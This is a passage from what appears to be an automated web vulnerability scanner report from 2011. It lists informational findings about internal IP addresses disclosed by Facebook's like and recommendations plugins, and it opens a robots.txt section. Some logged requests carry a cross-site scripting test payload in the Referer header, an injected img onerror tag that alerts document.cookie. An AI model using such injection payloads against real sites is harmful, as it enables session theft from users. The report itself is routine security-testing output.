Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.190.49
X-Cnection: close
Date: Sun, 04 Sep 2011 02:34:07 GMT
Content-Length: 30921

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.45. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=121244657904400&href=http://timesofindia.indiatimes.com/topic/Xss&send=false&layout=standard&width=250&show_faces=false&action=like&colorscheme=light&height=30 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.126.52
X-Cnection: close
Date: Sun, 04 Sep 2011 03:34:40 GMT
Content-Length: 24101

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.46. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=117787264903013&href=http%3A%2F%2Fwww.facebook.com%2FTimesofIndia&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.208.55
X-Cnection: close
Date: Sun, 04 Sep 2011 02:33:52 GMT
Content-Length: 23352

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.47. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=6b01f688a268fc70a489a8b444b7d021&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfda8cffc%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff25229271%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2FMy-friend-Ganesha%2Farticleshow%2F9855193.cms&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=500 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.201.34
X-Cnection: close
Date: Sun, 04 Sep 2011 03:05:55 GMT
Content-Length: 31022

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.48. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2daec7016fc76%26origin%3Dhttp%253A%252F%252Fwww.ndtv.com%252Ffad660e1725f28%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=190 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.226.37
X-Cnection: close
Date: Sun, 04 Sep 2011 02:38:08 GMT
Content-Length: 31144

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.49. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.22.55
Connection: close
Date: Sun, 04 Sep 2011 04:29:48 GMT
Content-Length: 26399

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.50. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df253c19cc8%26origin%3Dhttp%253A%252F%252Fwww.ndtv.com%252Ff12303bc74%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=190 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.95.64
X-Cnection: close
Date: Sun, 04 Sep 2011 02:25:56 GMT
Content-Length: 30077

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.51. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7f680b7a86e72%26origin%3Dhttp%253A%252F%252Fwww.ndtv.com%252Ffad660e1725f28%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=190 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.224.65
X-Cnection: close
Date: Sun, 04 Sep 2011 02:38:08 GMT
Content-Length: 31144

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.52. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3015021ea104c6%26origin%3Dhttp%253A%252F%252Fwww.ndtv.com%252Ff14d95cc52f2d7c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=190 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.184.48
X-Cnection: close
Date: Sun, 04 Sep 2011 02:36:33 GMT
Content-Length: 31148

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.53. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=117787264903013&href=http%3A%2F%2Fwww.facebook.com%2FTimesofIndia&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.91.42
X-Cnection: close
Date: Sun, 04 Sep 2011 02:27:10 GMT
Content-Length: 23367

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.54. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3189a47e8%26origin%3Dhttp%253A%252F%252Fwww.ndtv.com%252Ff8bf057ac%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=190 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.82.50
X-Cnection: close
Date: Sun, 04 Sep 2011 02:28:23 GMT
Content-Length: 31013

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.55. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c4b41ac%26origin%3Dhttp%253A%252F%252Fwww.ndtv.com%252Ff8bf057ac%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=190 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.85.55
X-Cnection: close
Date: Sun, 04 Sep 2011 02:28:23 GMT
Content-Length: 31010

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.56. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b8479cc917cf8%26origin%3Dhttp%253A%252F%252Fwww.ndtv.com%252Ff14d95cc52f2d7c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=190 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.2.124
X-Cnection: close
Date: Sun, 04 Sep 2011 03:57:59 GMT
Content-Length: 31148

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.57. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ef0c6f8%26origin%3Dhttp%253A%252F%252Fwww.ndtv.com%252Ff12303bc74%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=190 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.179.35
X-Cnection: close
Date: Sun, 04 Sep 2011 02:44:12 GMT
Content-Length: 30995

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.58. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.21.50
Connection: close
Date: Sun, 04 Sep 2011 04:29:52 GMT
Content-Length: 18006

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Facebook</title><style>body{background:#fff;font-size: 11px;font-f
...[SNIP]...

26.59. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/recommendations.php?site=http%3A%2F%2Fsocial.ndtv.com&width=313&height=315&header=false&colorscheme=light&font=arial&border_color=%23ffffff;&border=0; HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/NDTVProfit
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.155.62
X-Cnection: close
Date: Sun, 04 Sep 2011 03:38:44 GMT
Content-Length: 21516

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title></title><style>body{background:#fff;font-size: 11px;font-family:"l
...[SNIP]...

26.60. http://www.facebook.com/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.151.34
Connection: close
Date: Sun, 04 Sep 2011 04:29:33 GMT
Content-Length: 0


27. Robots.txt file  previous  next
There are 182 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


27.1. http://33across.com/api/opt-out.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://33across.com
Path:   /api/opt-out.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 33across.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:01:25 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 17:37:22 GMT
Accept-Ranges: bytes
Content-Length: 192
Cache-Control: max-age=1209600, proxy-revalidate
Expires: Sun, 18 Sep 2011 11:01:25 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
